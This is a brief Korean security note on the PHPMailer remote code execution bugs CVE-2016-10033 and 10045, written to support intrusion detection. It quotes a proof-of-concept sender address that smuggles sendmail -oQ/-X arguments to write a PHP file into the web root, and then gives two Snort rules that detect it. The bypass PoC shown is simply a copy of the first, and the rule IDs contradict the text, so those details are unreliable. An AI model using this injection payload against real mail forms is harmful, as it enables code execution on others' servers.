CVE-2016-100033, 10045 - PHPMailer Remote Code Execution

1. 취약점 설명

CVE-2016-10033 취약점 분석 참고

공격 유형 (벡터)

1) CVE-2016-10033

1) PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; $msg_body  = "<?php phpinfo(); ?>";

2) CVE-2016-10045

2) Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; $msg_body  = "<?php phpinfo(); ?>";

2. 탐지 Rule 

두가지 모두 같은 문자열을 탐지하기 위한 Rule로 1) pcre 기반, 2) content 기반 2가지로 생성 하였습니다. 

(중복룰로 둘중 하나면 사용하면 되어 모두 sid 1로 생성하였습니다.)

1) 

alert tcp any any -> any any (msg:"Vulmon_PHPMailer_RCE"; pcre:"/\\\".{1,40}-oQ.{1,40}-X.{1,40}\.php.{1,40}@/i"; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html;  reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html; sid:1; rev:2;)

2)

alert tcp any any -> any any (msg:"Vulmon_PHPMailer_RCE2"; content:"|5C 22|"; content:"-oQ"; within:40; nocase; content:"-X"; within:40; content:"php"; within:40; nocase; content:"@"; within:40; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html;  reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html; sid:2; rev:1;)